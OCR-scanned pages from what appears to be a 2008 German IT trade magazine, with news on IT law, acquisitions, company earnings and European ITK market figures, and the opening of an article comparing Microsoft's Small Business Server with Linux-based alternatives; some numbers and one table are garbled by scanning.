ten ihre Partner künftig stärker 
überwachen. Rein vertragliche 
Regelungen schützen im Zwei- 
fel nicht vor gerichtlicher Inan- 
spruchnahme. Tobias Haar 


Outsourcing berechtigt zur Kündigung 


Ein Unternehmer darf Mitarbei- 
tern einer Abteilung kündigen, 
die der Arbeitgeber im Wege 
des Outsourcing aufgibt. Das 
hat das Bundesarbeitsgericht 
(Az. AZR 1037/06) entschie- 
den. Im konkreten Fall wurde 
die bislang von Mitarbeitern 
erbrachten Leistungen an selbst- 
ständige Unternehmer verge- 
ben, um Sozialabgaben zu 
sparen. Gegen die betriebsbe- 
dingten Kündigungen klagten 
die entlassenen Mitarbeiter und 
unterlagen nun vor dem höchs- 


ten deutschen Arbeitsgericht. 
Allerdings darf es sich bei ei- 
ner Outsourcing-Entscheidung 
nicht um eine willkürliche 
Maßnahme handeln. Zudem 
muss ein Unternehmen sie tat- 
sächlich umsetzen. Sie darf 
nicht nur vorgeschoben sein, 
um Sozialabgaben zu sparen. 
Ebenso wenig darf das Unter- 
nehmen die „Mitarbeiter‘‘ künf- 
tig als Selbstständige weiterbe- 
schäftigen, obwohl sie fest in 
die Betriebsorganisation einge- 
gliedert bleiben. Tobias Haar 


Weitere Reform des Urheberrechts 


Der Bundestag hat mit einer 
weiteren Reform des Urheber- 
rechts den Kampf gegen Pro- 
duktpiraterie erleichtert und 
damit das geistige Eigentum 
gestärkt, so die offizielle Pres- 
seerklärung des Bundesjustizmi- 
nisteriums. Werden Verletzun- 
gen im „gewerblichen Ausmaß“ 
vorgetragen, haben künftig et- 
wa auch Accessprovider eine 
Auskunftspflicht über den An- 
schlussinhaber, wenn dies ein 
Richter anordnet. Der „Um- 
weg“ über staatsanwaltschaftli- 


che Ermittlungsverfahren kann 
in diesen Fällen künftig entfal- 
len. Der Verletzer muss zudem 
auf Antrag Urkunden vorlegen 
und Sachen besichtigen lassen, 
selbst wenn es sich hierbei um 
Betriebsgeheimnisse handelt. 
Das Gericht hat aber für ange- 
messenen Schutz der Vertrau- 
lichkeit zu sorgen. Auch Ver- 
braucherrechte werden gestärkt, 
da Abmahngebühren bei Urhe- 
berrechtsverletzungen künftig 
nur noch 100 Euro betragen 
dürfen. Tobias Haar 
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eo eo .. 
IBM: Ereignisse zu Muster zusammenfügen 
o 


Mit Websphere Business Events 
erweitert IBM sein Portfolio für 
die Ereignisverarbeitung in ser- 
viceorientierten Architekturen. 
Das Werkzeug beruht auf der 
Technik des im Januar über- 
nommenen Anbieters Aptsoft 
und soll Verbindungen zwi- 
schen verschiedenen Ereignis- 
sen erkennen. Im Idealfall kann 
die Software automatisch die 
Muster analysieren und auf- 
grund von Geschäftsregeln eine 
Aktion ohne menschliche Hilfe 
anstoßen. Laut IBM ist das Pro- 
gramm in der Lage, mehr als 


zehn Millionen Transaktionen 
täglich zu analysieren. Bei- 
spielsweise soll es Muster für 
betrügerische Tätigkeiten auf- 
decken, Produktfehler finden 
oder Verkaufschancen identifi- 
zieren. Business Events wendet 
sich an Geschäftsanwender, das 
heißt, die Ereignisse sind de- 
klarativ in der entsprechenden 
Begrifflichkeit beschrieben und 
sollen sich leicht ändern lassen. 
Regel-Templates helfen dem 
Benutzer dabei, Muster oder 
Filter für bestimmte Aktionen 
zu erstellen. Susanne Franke 


Kooperation für sicheres Banking 


ACI Worldwide und Eunexus 
bieten eine gemeinsame Lö- 
sung zum Eindämmen von Be- 
trug und Missbrauch beim 
Internet-Banking an. Eunexus 
integriert seine IP-Profiling- 
Technik, die verdächtige IP- 
Adressen erkennt, in ACIs Pro- 
active Risk Manager. Dieses 
Programm überwacht Transak- 


tionen in Echtzeit und alar- 
miert das Finanzinstitut oder 
stoppt den Buchungsvorgang, 
wenn er von einer verdächti- 
gen IP-Adresse ausgelöst wird. 
Eunexus verkauft Security- 
und Fraud-Produkte für Inter- 
net-Anwendungen, ACI Lö- 
sungen für den elektronischen 
Zahlungsverkehr. 


SAP: Komplettangebote für den Mittelstand 


Sowohl mit HP als auch mit 
IBM will SAP vorinstallierte 
Business-All-in-one-Lösungen 
vermarkten. Die HP-Variante 
soll auf Proliant-Maschinen oder 
Servern aus der Reihe Blade- 
system c3000 laufen. Zielgrup- 
pe sind mittelständische Un- 
ternehmen aus den Bereichen 
Fertigung, Dienstleistungen und 
Handel. Das Angebot basiert 
auf dem kürzlich vorgestellten 
Fast-Start-Programm für Busi- 
ness All-in-one. Neben der 
ERP-Software umfasst das Pa- 
ket die Datenbank MaxDB so- 


wie das Betriebssystem Suse 
Linux Enterprise Server von 
Novell. 

Auch die Partnerschaft mit 
IBM wird intensiviert. Die bei- 
den Firmen planen, ihre An- 
gebote für den Mittelstand zu 
kombinieren. Diese Offerte läuft 
wahlweise auf IBM System x, 
Bladecenter oder Power Sys- 
tems. Zudem beinhaltet sie Da- 
tenbank (MaxDB oder DB2) 
und Betriebssystem (Suse Li- 
nux Enterprise Server). Beide 
Pakete kommen laut SAP noch 
dieses Jahr auf den Markt. 


Crossgate offeriert EDI-Flatrate 


Für eine fixe monatliche Ge- 
bühr will Crossgate einen 
schnellen und stressfreien Ein- 
stieg in die EDI-Welt anbieten. 
Das Komplettpaket enthält ei- 
ne lebenslange Garantie, die 
jede künftige Anforderung ab- 
deckt, egal ob es sich um den 
Ausbau, neue Kundenwünsche 
oder das Zollverfahren AT- 


LAS handelt. Die in drei Stu- 
fen verfügbare monatliche Flat- 
rate deckt Softwarewartung, 
Support, ein Freivolumen an 
Geschäftspartnerprofilen sowie 
ATLAS ab. Dem Kunden der 
insolventen Mosaic Software 
AG macht Crossgate ein Mi- 
grationsangebot (www.cross 
gate.de). 
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Einkauf: EMC schloss mit 
der Iomega Corporation ei- 
ne Akquisitionsvereinba- 
rung. Demzufolge wird man 
den Plattenspeicherspezia- 
listen für etwa 213 Mio.$ 
übernehmen. Iomega soll 
zentraler Bestandteil des 
neuen Geschäftsbereichs 
„Consumer/Small Business 
Products Division“ bei 
EMC werden. 


Gesichert: IBM erwarb Di- 
ligent Technologies, einen 
Spezialisten auf dem Feld 
der sogenannten Deduplika- 
tionstechnologie. Die Über- 
nahme ist die dritte spei- 
cherbezogene Akquisition 
der IBM in jüngster Zeit. Im 
Januar hat Big Blue XIV 
gekauft, Anfang April traf 
IBMs Interesse FilesX. 


Einstieg: Perot Systems 
Corporation übernimmt die 
„HighQ IT for the manu- 
facturing industry“ (HighQ 
IT) aus Ottobrunn. Durch 
den Kauf will der US-ame- 
rikanische IT-Dienstleister 
sein Angebot an SAP-Ser- 
vices und industriespezifi- 
schen Beratungen vergrö- 
Bern. Das Unternehmen 
„HighQ IT for the financial 
industry“ ist nicht Bestand- 
teil der Übernahme. 


Lichtblick: Nokia geht, 
RIM (Research in Motion) 
kommt. Der Backberry- 
Hersteller beabsichtigt, in 
Bochum ein Forschungs- 
zentrum aufzubauen. Noch 
in diesem Sommer sollen 
dort 140 bis 180 Mitarbeiter 
eine Beschäftigung finden 
und Hard- und Software für 
Smartphones entwickeln. 
Für das erste Jahr plant RIM 
Investitionen in Höhe von 
45 Mio.$. 


Mit Power: Infineon Tech- 
nologies verstärkt seine 
Aktivität im Bereich der 
Energie-Management- 
Applikationen mit der Über- 
nahme von Primarion. Das 
Unternehmen zählt zu den 
Spezialisten in den Berei- 
chen Design, Fertigung und 
Marketing von Chips für di- 
gitales Power-Management 
in Computer-, Grafik- und 
Kommunikationssoftware. 
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Hightech-Branche in Europa 


Wachstum verlangsamt 


Achim Born 


Der ITK-Markt legt laut dem European Information Technology Observatory 
(EITO) in ganz Europa weiter zu. Unter den großen Ländern sind Spanien und 
Frankreich die boomenden Märkte. 


er europäische Markt für 

IT, Telekommunikation 
und digitale Unterhaltungs- 
elektronik wird dieses Jahr 
voraussichtlich um 3 % auf 
761 Mrd. € wachsen. Dies ver- 
meldet der Bitkom mit Blick 
auf die jüngste EITO-Statistik. 
Im kommenden Jahr soll sich 
das Wachstum auf etwas nie- 
drigerem Niveau (2,4 %) auf 
dann 780 Mrd. € fortsetzen. 
Unter den großen Ländern 
wachsen heuer Spanien mit 
4,6 % und Frankreich mit 32% 
am stärksten. Neuer Umsatz- 
Spitzenreiter ist jedoch Groß- 
britannien. Mit einem Marktvo- 
lumen von 152 Mrd. € liegt das 
Vereinigte Königreich vor 
Deutschland, das 145 Mrd € 
aufweist. Als Grund führen die 
Bitkom-Vertreter das Outsour- 
cing-Geschäft an, da britische 
Unternehmen und Behörden in 
der EU mit Abstand am stärks- 
ten ihre IT auslagern. Hierzu- 
lande würden vergleichbare 
Leistungen oft noch firmenin- 
tern erbracht und flössen daher 
nicht in die Marktstatistik ein. 


Die stärksten Impulse liefert 
die Informationstechnik. Der 
IT-Markt legt derzeit EU-weit 
um 4,3 % auf 313 Mrd. € zu. 
Wenig überraschend boomen 
innerhalb dieses Segments vor 
allem IT-Services (5,7 %) und 
Software (5,2 %). Bei IT-Ser- 
vices verzeichnet der Outsour- 
cing-Markt mit 74% das 
höchste Plus. Für das kommen- 
de Jahr rechnet man beim EITO 
europaweit mit einem Plus von 
44% auf 326 Mrd. €. 

Im Telekommunikationssek- 
tor fällt das Wachstum dieses 
Jahr nicht nur in Deutschland 
vergleichsweise gering aus. Eu- 
ropaweit wächst der TK-Markt 
2008 um 2 % auf 386 Mrd. €. 
Während die Umsätze mit Fest- 
netzgesprächen rückläufig sind, 
gibt es starke Zuwächse bei 
Datendiensten. Mit rund 11 % 
Umsatzplus boomen sowohl 
feste Internet-Zugänge und 
Dienste als auch mobile Daten- 
dienste. Für 2009 wird auf Eu- 
ropaebene ein Plus von 1,8 % 
auf 393 Mrd. € im Telekommu- 
nikationsmarkt erwartet. 


Fujitsu Siemens schrumpft - 
Parinerschaftsvertrag erstmals kündbar 


Das im vergangenen Jahr for- 
mulierte Umsatzziel erwies 
sich für FSC (Fujitsu Siemens 
Computers) als zu hoch. Statt 
die 7-Mrd.-€-Marke beim 
Umsatz zu passieren, musste 
man einen Rückgang von 
4,9 % auf 6,6 Mrd. € für das 
Geschäftsjahr 2007 melden. 
Immerhin konnte das Unter- 
nehmen im Zeitraum April 
2007 bis März 2008 den Vor- 
steuergewinn um 15 % von 
91 Mio. auf 105 Mio. € stei- 
gern. Die ursprünglich ange- 
strebte Vorsteuer-Rendite von 
2 % konnte FSC damit zwar 
nicht erreichen. Die aktuellen 


1,6 % erachtet das Manage- 
ment im Vergleich aber als 
„gar nicht so schlecht“. 

Ungeachtet der Markt- 
schwierigkeiten ist FSC-Chef 
Bernd Bischoff optimistisch, 
dass die Investitionen in den 
Auftritt als Infrastrukturanbie- 
ter und des Service-Portfolios 
sich in Bälde auszahlen. Span- 
nend werden die kommenden 
Monate für FSC allemal, denn 
im neuen Geschäftsjahr besteht 
für Fujitsu oder Siemens die 
Möglichkeit, den auf zehn 
Jahre geschlossenen Partner- 
schaftsvertrag erstmalig zu be- 
enden. 


Quelle: Bitkom, 5/08 


Die Nachfrage nach digita- 
ler Unterhaltungselektronik 
steigt ebenfalls. Die Umsätze 
wachsen 2008 um 2,5 % auf 
63 Mrd. €. Dominant sind 
hier die Geschäfte mit flachen 
TV-Geräten, die 40 % des 
Marktvolumens ausmachen. 
Es folgen Digitalkameras mit 
11 % und Spielkonsolen mit 
8%. Da inzwischen viele 
Haushalte diese digitalen Ge- 
räte besitzen und gleichzeitig 
die Preise fallen, sollen im 
Jahr 2009 die Umsätze auf 
dem europäischen CE-Markt 
um 3,2 % auf 61 Mrd. € zu- 
rückgehen. (WM) 


Europäischer ITK-Markt 


+43%, |+30%| |+24% 
2007 2008 2009 
Angaben in Milliarden Euro 


Suchen im eigenen 
Datenbestand 


Das Interesse an unternehmens- 
internen Suchmaschinen steigt 
in Deutschland stetig, meldet 
die Experton Group. Für das 
laufende Jahr erwartet die 
Marktforschungsfirma, dass die 
Unternehmen für entsprechende 
Projekte 61,4 Mio. € ausgeben. 
2009 sollen es schon 18 % mehr 
sein. Das Marktvolumen für 
2010 wird auf knapp 85 Mio. € 
veranschlagt. Neben eigenen 
internen Anforderungen sollen 
zusätzlich externe Faktoren wie 
die Einhaltung von Compliance- 
Anforderungen den Einsatz 
professioneller Suchlösungen in 
Unternehmen vorantreiben. 
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Freenet kauft Debitel 


United-Internet-Chef Ralph 
Dommermuth mühte sich ver- 
gebens. Eckhard Spoerr, Vor- 
standsvorsitzender der Freenet 
AG, ließ sich weder durch gutes 
Zureden noch Drohungen vom 
Kauf der Debitel Group abbrin- 
gen. Die Übernahme umfasst im 
Wesentlichen die Debitel AG, 
die Talkline GmbH und die 
_dug telecom ag. Offizielle Ver- 
käuferin ist die von den Permira 
Fonds mehrheitlich kontrollier- 
te Holding „Debitel (Nether- 
lands) Holding BV“. Diese er- 
hält als Gegenleistung von 
freenet 32 Mio. neue Aktien, 
was 24,99 % und einem Wert 
von rund 360 Mio. € entspricht, 
sowie ein langfristiges verzins- 


liches Verkäuferdarlehen von 
132,5 Mio. €. Zugleich über- 
nimmt Freenet die über einer 
Milliarde Euro Schulden der 
Debitel Group, sodass sich der 
Kaufpreis auf insgesamt 
1,63 Mrd. € summiert. Durch 
die Übernahme von Debitel 
sieht sich die Freenet AG als 
führendes netzunabhängiges Te- 
lekommunikations- und Inter- 
net-Unternehmen in Deutsch- 
land. Bis zum Vollzug des 
Kaufs wird allerdings noch ein 
wenig Zeit verstreichen, da man 
noch die börsentechnischen 
Voraussetzungen für die Ausga- 
be neuer Aktien schaffen muss. 
Die Zustimmung des Bundes- 
kartellamtes steht ebenfalls aus. 


Gewinn der SAP bricht ein 


Nach einhelliger Ansicht von 
Finanzexperten hat SAP das 
Auftaktquartal kräftig vermas- 
selt. Zwar steigerte das Wall- 
dorfer Softwarehaus die Ein- 
nahmen mit Softwarelizenzen 
und -wartung im zweistelligen 
Prozentbereich: Den Analysten 
war das jedoch zu wenig. Sie 
hatten für Software und soft- 
warebezogene Serviceerlöse 
mit 1,83 Mrd. € gerechnet. 
Ähnliches gilt für das Kon- 
zernergebnis. Hier hatte man 
aufgrund der Business-Ob- 
jects-Übernahme zwar einen 
Rückgang auf 290 Mio. € ein- 
geplant, mit 242 Mio. € ver- 
fehlte SAP diesen Wert jedoch 
überdeutlich. Allerdings muss 
man SAP zugutehalten, dass 
ohne Wechselkurseinfluss das 
Betriebsergebnis wesentlich er- 
freulicher ausgefallen wäre. 
Neben dem mageren Ergeb- 
nis ruft die Verzögerung des 
neuen Mittelstandsproduktes 
Business ByDesign Stirnrun- 
zeln bei den Finanzanalysten 
hervor. Die Vermarktungsplä- 
ne der von SAP im Mietmodell 


(Software as a Service) offe- 
rierten Lösung wurden einer 
deutlichen Revision unterzo- 
gen. So soll sich die Marktein- 
führung 2008 auf die sechs 
Länder konzentrieren, in denen 
die aktuellen Kunden ansässig 
sind; erst 2009 werden mehr 
Länder folgen. Des Weiteren 
erwartet SAP, dass es rund 
12 bis 18 Monate länger dau- 
ern wird, das ursprünglich für 
2010 anvisierte Ziel von 
1 Mrd. $ Umsatz und 10 000 
Kunden zu erreichen. Im lau- 
fenden Jahr geht man nun auch 
von deutlich weniger als 1000 
Kundenprojekten aus. 

Infolge der angepassten Plä- 
ne reduziert SAP die Investitio- 
nen in die neue Software 2008 
um rund 100 Mio. €, was auf 
der anderen Seite zwangsläufig 
einen positiven Effekt auf die 
operative Marge ausübt. Ab 
2009 soll es auch keine zusätz- 
lichen Investitionen mehr ge- 
ben. Stattdessen sollen die Kos- 
ten in Bezug auf Business 
ByDesign aus dem operativen 
Geschäft finanziert werden. 


Optimistische 
ITK-Branche 


Die ITK-Industrie Deutschlands 
blickt weiterhin mit Zuversicht 
auf die Geschäftsentwicklung 
dieses Jahres. 73 % der Un- 
ternehmen erwarten steigende 
Umsätze. 17 % rechnen mit ei- 
nem stabilen Geschäft und nur 
10% mit Rückgängen. Das geht 
aus der aktuellen Umfrage des 
ITK-Lobbyverbandes Bitkom 
hervor. Wie in den früheren 
Umfragen prognostizieren ins- 
besondere die Softwarehäuser 
und IT-Dienstleister gute Ge- 
schäfte. 79 % der in diesem 
Segment tätigen Anbieter er- 
warten 2008 steigende Umsät- 
ze. Fast drei Viertel gehen zu- 
dem von höheren Gewinnen 
aus. Auch zwei Drittel der Her- 
steller von Computern und an- 
deren IT-Geräten erwarten ein 
Umsatzplus. 


Den Aktionären von Netmanage 
hat Micro Focus einen Auf- 
schlag von rund 73 % gegen- 
über dem Schlusskurs vom 30. 
April 2008 angeboten. Der 
Gesamtwert liegt somit bei 
73,3 Mio. $, wobei das Barver- 
mögen von Netmanage mit 
rund 25 Mio. $ eingeschlossen 
ist. Die Zustimmung der An- 
teilseigner von Netmanage soll 
bis Juni 2008 vorliegen. 


Initiative gegen 
Fachkräftemangel 


Zum 5. Mai fiel der Startschuss 
der Initiative „MINT - Zukunft 
schaffen“. Ziel der Wirtschafts- 
verbände BDA und BDI ist es, 
vermehrt Fachkräfte mit den 
Qualifikationen in den Fächern 
Mathematik, Informatik, Natur- 
wissenschaften und Technik 
(MINT) zu gewinnen. Schüler 
und Schülerinnen ab der 8. 
Klasse und deren Lehrkräfte 


will man gezielt ansprechen, 
SAP-Bilanz für a1 2008 7 im die Zahl der Sudienanfin- 


01 200° 012007 Veränderung ohne Währungseffckt ger sowie Ausbildungsbewer- 


Softwareerläse [yn) 562 D 18 ber in den einschlägigen Dis- 
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Yang ziert sich, Ballmer will nicht mehr 


Die Bestrafung folgte auf dem 
Fuß. Das Scheitern der Fu- 
sionsgespräche zwischen Mi- 
crosoft und Yahoo führte bei 
Börseneröffnung am Montag, 
den 5. Mai, zu einem Kursein- 
bruch von rund 20 % bei den 
Papieren des Internet-Portalbe- 
treibers. Die Aktie von Micro- 
soft legte dagegen um 4,5 % 
zu. Am Samstag zuvor hatte 
Microsoft-Chef Steve Ballmer 
überraschend den Schlussstrich 
gezogen. „Trotz unserer Be- 
mühungen, die auch eine Erhö- 
hung des Gebots um rund 
5 Mrd. $ umfasste, hat Yahoo 
unser Gebot nicht angenom- 
men“, heißt es in dem ver- 
öffentlichten Schreiben. Ins- 
gesamt hatte Ballmer rund 
50 Mrd. $ geboten. Die 33 $ je 
Aktie — 2 $ mehr als zu Beginn 
des Kaufangebots — waren dem 
Yahoo-Gründer und Chef Jer- 
ry Yang noch immer zu wenig. 


Er forderte zum Schluss min- 
destens 37 $ - wenn nicht gar 
38 $ - pro Papier. Nicht weni- 
ge Beobachter waren davon 
überzeugt, dass Yang über- 
haupt nicht verkaufen wollte. 

Allgemein hatte man entwe- 
der mit einer Einigung auf 
Basis von 34 $ oder mit dem 
Versuch einer feindlichen 
Übernahme gerechnet. Schließ- 
lich hätte das Schlussangebot 
für Inhaber von Yahoo-Papie- 
ren ein Plus von mehr als 70 % 
gegenüber dem Kurs vor der 
Offerte Ende Januar bedeutet. 
Entsprechend harsch fielen die 
ersten Kommentare von Bör- 
senanalysten und Vermögens- 
verwalter aus. Falls es Yang in 
absehbarer Zeit nicht gelingt, 
einen weißen Ritter aus dem 
Hut zu zaubern, wird eine 
Klageflut seitens der Aktionä- 
re nicht lange auf sich warten 
lassen. 


Siemens-Gewinn schwindet 


Einen Gewinneinbruch meldet 
Siemens für das zweite Ge- 
schäftsquartal (Januar bis 
März). Den Umsatz konnte der 
Münchener Konzern, dessen 
Schmiergeldaffäre die Schlag- 
zeilen der Wirtschaftsgazetten 
dominiert, zwar um 1 % auf 
18 Mrd. € ausbauen. Der Ge- 
winn nach Steuern betrug da- 
gegen nur noch 412 Mio. €, 
nach 1,2 Mrd. € in der Vorjah- 
resperiode. Die Rückgänge 
sind hauptsächlich auf das Er- 
gebnis des operativen Geschäf- 
tes zurückzuführen. In der 
Kraftwerkssparte fehlten in ers- 
ter Linie Ingenieure zum Be- 
wältigen von Aufträge. Die 
Transportsparte litt weiterhin 
unter der störanfälligen Nie- 
derflur-Straßenbahn Combino. 
Schlecht liefen auch die Ge- 
schäfte des Bereichs IT Solu- 
tions and Services mit einem 
Umsatz von 1,3 Mrd. € (-6 %). 


Mieses Quartal für Sun 


Die schwarzen Zahlen sind 
bei Sun erst einmal wieder 
vorbei. Zumindest gilt dies 
für das im März beendete 
dritte Geschäftsjahresquartal. 
Weniger Einnahmen als er- 
hofft führten zu einem Netto- 
verlust von 34 Mio. $. Der 
Umsatz fiel im Vergleich zum 
Vorjahr mit 3,3 Mrd. $ etwas 
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Für den weiteren Ge- 
schäftsjahresverlauf gibt sich 
der neue Siemens-Chef Peter 
Löscher „verhalten optimis- 
tisch“. Der Umsatz soll im 
Gesamtjahr um rund 6 % zu- 
legen. Das operative Ergebnis 
soll - trotz des Einbruchs im 
zweiten Quartal — das Vorjah- 
resniveau erreichen. Aller- 
dings gibt es weiterhin einige 
Unbekannte in der Siemens- 
Bilanz. Es steht noch der Ver- 
kauf der darbenden TK-Anla- 
gensparte SEN aus, der einige 
Belastungen nach sich ziehen 
wird. Des Weiteren bereitet 
die Korruptionsaffäre noch 
enorme Kosten. Allein die 
hier tätigen Ermittler und Be- 
rater sollen Siemens im zwei- 
ten Quartal 175 Mio. € gekos- 
tet haben, von zu erwartenden 
steuerlichen Nachforderungen 
und Strafzahlungen ganz zu 
schweigen. 


niedriger aus. Als Erklärung 
nannte das Sun-Management 
den Kauf von MySQL und 
die schwächelnde US-Kon- 
junktur. Für Sun ist die Ent- 
wicklung alles andere als er- 
freulich. Bis zu 2500 der rund 
34 400 Mitarbeiter müssen 
nun befürchten, ihre Arbeit zu 
verlieren. 
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Linux SBS 


Christian Böttger 


Kleinere Unternehmen interessieren sich nicht wirklich 

für die Technik eines Servers - er soll einfach ihren Bedarf 
abdecken und laufen. Dies lässt sich nicht nur mit Microsofts 
Small Business Server, sondern immer besser auch mit Linux- 


basierten Systemen erreichen. 


or allem kleinere Firmen haben 
Ve: Anforderungen: Sie 

haben kein Geld zum Aufbau ei- 
ner umfangreichen Infrastruktur, daher 
sollten alle Funktionen auf einem einzi- 
gen Server vorhanden sein — unter Be- 
achtung eines ausreichenden Sicher- 
heitsniveaus. Letzteres behandelt der 
Artikel „Lochmuster“ in dieser Ausga- 
be [1]. Auch existiert oft weder um- 
fangreiches IT-Wissen noch genügend 
Zeit zur Betreuung komplexer Systeme. 
Die müssen also einfach einzurichten 
und zu handhaben sein. Deshalb ist ei- 
ne einheitliche grafische Oberfläche für 
alle Funktionen unverzichtbar. Kom- 
mandozeilen-Tools können höchstens 
als Ergänzung zum Einsatz kommen. 
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Den Takt gibt in diesem Markt — wie- 
der einmal — Microsoft mit dem Small 
Business Server (SBS) vor. Er arbeitet 
als Mailserver und stellt Kalender und 
Adressdaten mit Exchange bereit, bie- 
tet Datei- und Druckdienste, eine Ver- 
waltung der Arbeitsplatzrechner mit 
Push-Updates, eine zentrale Benutzer- 
verwaltung und in der Professional- 
Version auch einen Datenbankserver 
(MS SQL). Und alles lässt sich über ei- 
ne grafische Oberfläche (Serververwal- 
tungskonsole) einheitlich verwalten. 
Alle Komponenten arbeiten, da sie aus 
einer Hand stammen, mehr oder weni- 
ger reibungslos zusammen. Lediglich 
der SQL-Server entwickelt ein leichtes 
Eigenleben. 


Natürlich lassen sich die Basisfunk- 
tionen eines Servers für kleinere und 
mittlere Unternehmen (KMU) auch mit 
Linux-basierten Systemen darstellen. 
Allerdings sind die großen Distributio- 
nen wie Suse Linux Enterprise Server 
(SLES) oder Red Hats Enterprise Li- 
nux (RHEL) eher als eierlegende Woll- 
milchsäue für größere Firmen zuge- 
schnitten. Um sie in KMU einzusetzen, 
ist ein nicht unerheblicher Aufwand für 
das „Zurechtstutzen“ und Konfigurie- 
ren einzuplanen. Außerdem fehlt ihnen 
eine einheitliche Administrationssoft- 
ware, mit der sich alle Komponenten 
aus einem Guss verwalten lassen. 


Kandidaten jenseits 
des Platzhirsches 


Debian lässt sich natürlich ebenso ein- 
setzen, zielt aber nicht explizit in diese 
Richtung, auch Ubuntu kümmert sich 
derzeit noch eher rudimentär um KMU. 
Während Novell mit seinem Open 
Workgroup Server — Small Business 
Edition eine für kleine Unternehmen an- 
gepasste Version bietet, findet sich ver- 
gleichbares bei Red Hat derzeit nicht. 
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Jedoch auch unabhängig von den 
„großen“ Distributionen gibt es inter- 
essante Ansätze, die sich um einige 
Linux-Groupware-Lösungen herum her- 
auskristallisiert haben. Mehrere „Li- 
nux-SBS‘“ (Small Business Server) set- 
zen auf das freie Kolab-Projekt als 
Groupware-Komponente, aber zuneh- 
mend gewinnt die proprietäre Lösung 
Zarafa an Verbreitung. Scalix ist eben- 
falls vertreten, zielt aber strukturell 
eher auf größere Installationen. 

Vorreiter auf diesem Gebiet ist Uni- 
vention mit seinem Corporate Server 
UCS, der als Groupware-Komponente 
Kolab einsetzt. Für Freunde anderer 
Lösungen bieten die Bremer jedoch 
auch Zarafa oder Scalix als Modul an. 
Mit dem UCS lassen sich angeschlos- 
sene Arbeitsplätze verwalten. 

Collax richtet sich gezielt an kleine 
Unternehmen, als Groupware ist (gegen 
Aufpreis) Open-Xchange an Bord. Bei 
Bedarf liefert man die Lösung als vor- 
konfigurierte Appliance inklusive Hard- 
ware. Collax versucht verstärkt, auch 
„Klassische“ Anbieter von Anwendungs- 
software aus der Windows-Welt für eine 
Portierung auf den Collax Business Ser- 
ver zu gewinnen; hier sind Pentaprise 
und Sage zu nennen. 

Die Linux Information Systems AG 
(LIS AG) aus München und Berlin bie- 
tet mit CoreBiz ebenfalls einen speziell 
für KMU geeigneten Server, der sich als 
Baukasten an die Anforderungen anpas- 
sen lässt. Als Groupware nutzt die LIS 
AG ebenfalls das freie Kolab. Die Li- 
nux-Spezialisten liefern ihren Server 
nicht von der Stange, sondern fertig mit 
den jeweiligen kundenspezifischen Ein- 
stellungen — die Betreuung ist sozusagen 
Pflicht. Linux-Arbeitsplätze lassen sich 
ebenfalls zentral verwalten. 

Aus Kanada stammt der Xandros 
Server, der nach dem Kauf der Firma 
Scalix durch Xandros natürlich auf 
den gleichnamigen Mail- und Group- 
ware-Server setzt. Für den deutschen 
KMU-Markt eher hinderlich ist, dass 
große Teile der Administrationssoft- 
ware nur auf Englisch existieren. 
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Microsofts Small Business Server verfügt mit der Managemanitkonsole über ein 
leistungsfähiges Administrationswerkzeug (Abb. 1). 


Alle Linux-Varianten setzen auf eine 
eigene Oberfläche zur Administration, 
sodass der Nutzer (Administrator) 
kaum noch mit dem darunter liegenden 
Linux in Berührung kommt - gut für 
den Umstieg. Die Oberflächen sind oft, 
aber nicht immer, webbasiert (Collax, 
Univention, Novell), einige Hersteller 
bevorzugen jedoch eine „klassische“ 
GUI-Anwendung (Microsoft, CoreBiz, 
Xandros). Den Bedienkomfort eines 
Microsoft SBS bieten solche Lösungen 
allerdings leider noch nicht ganz. 


Zum Test lag Microsofts SBS in der 
„Premium Edition Release 2 SP1“ vor. 
Die Installation erfolgte wie bei allen 
Systemen in einer virtuellen Maschine 
unter VMware Server 1.0.4. Als Host- 
system diente ein Linux-x86_64-Sys- 
tem unter Opensuse 10.3. 

Der SBS umfasst acht CDs: Fünf ent- 
halten den Server, zwei weitere die zu- 
sätzliche Software der Premium Edition 
und die letzte die Updates der Release 2. 


Microsoft Small 
Business Server 


das Revier streitig machen wollen. 


A-TRACT 


© Server-Lösungen für kleine und mittlere Unternehmen müssen vor allem funktional 
vollständig und leicht zu bedienen sein. 


© Trotz allen Bedienkomforts für die Administration darf das Sicherheitsniveau der 
Produkte nicht unberücksichtigt bleiben. 


© Es existiert eine Reihe von Linux-Ansätzen, die dem Platzhirsch im KMU-Segment 
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Bei der Installation erkennt das Sys- 
tem die vorhandene Netzumgebung und 
kann sich beispielsweise eines vorhan- 
denen DHCP-Servers bedienen. Wahl- 
weise lassen sich eigene DHCP- und 
DNS-Server einspielen. Nach dem Auf- 
spielen des Servers (sprich nach den ers- 
ten fünf CDs) startet ein Assistent und 
fragt alle nötigen Einstellungen ab. Die 
erfragten Fakten sind sehr umfassend, 
sodass anschließend kaum Handarbeit 
nötig ist. Das aktuelle SP2 kann man 
entweder aus dem Internet herunterladen 
oder von CD 6 installieren. In jedem Fall 
sind danach weitere Online-Updates er- 
forderlich; nach dem nächsten Neustart 
lädt das System nochmals zwischen 50 
und 60 Pakete herunter und installiert 
diese. Ebenfalls auf CD 6 befinden sich 
die Windows-Updates, die Service Ma- 
nagement Console sowie ‚Net 2.0. 

Derzeit basiert der SBS noch auf 
dem schon etwas in die Jahre gekom- 
menen Windows 2003 Server. Der Zu- 
satz „Small Business“ ist durchaus 
ernst zu nehmen: Mehr als 75 Client- 
Lizenzen sind nicht vorgesehen, ebenso 
wenig wie weitere Windows-Server im 
Netz. Die Premium Edition umfasst zu- 
sätzlich zum normalen SBS einen MS- 
SQL-Server, den ISA-Server, Front- 
page sowie das Business Intelligence 
Development Studio. Die einzige Hür- 
de im Test stellte der SQL-Server auf 
CD 7 dar: Er ließ sich erst nach dem 
Einspielen der Client Tools von CD 8 
installieren. 

Anschließend präsentiert sich der 
SBS im gewohnten Windows-Look. Die 
Administration erfolgt über die grafi- 
sche Management Console. Hier sind in 
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Linux SBS 


Baumstruktur alle Elemente von der 
Nutzerverwaltung über ADS/Domänen- 
Administration bis hin zum eingebau- 
ten Exchange- und SQL-Server vereint. 
Wegen der vielen Funktionen dauert es 
zwar eine Weile, bis der Neuling die ge- 
suchten Dinge findet, aber die Struktur 
ist insgesamt logisch und alle Parameter 
sind konfigurierbar — wenn auch manch- 
mal tief in Untermenüs versteckt. Man 
erreicht die einzelnen Administrations- 
aufgaben aber auch über den üblichen 
Weg „Start -> Verwaltung“. 

Zum Verbinden eines Arbeitsplatz- 
rechners mit dem SBS muss der Admi- 
nistrator auf dem jeweiligen Client le- 
diglich im Internet Explorer einen 
bestimmten URL aufrufen; die Client- 
Konfiguration erfolgt via ActiveX ge- 
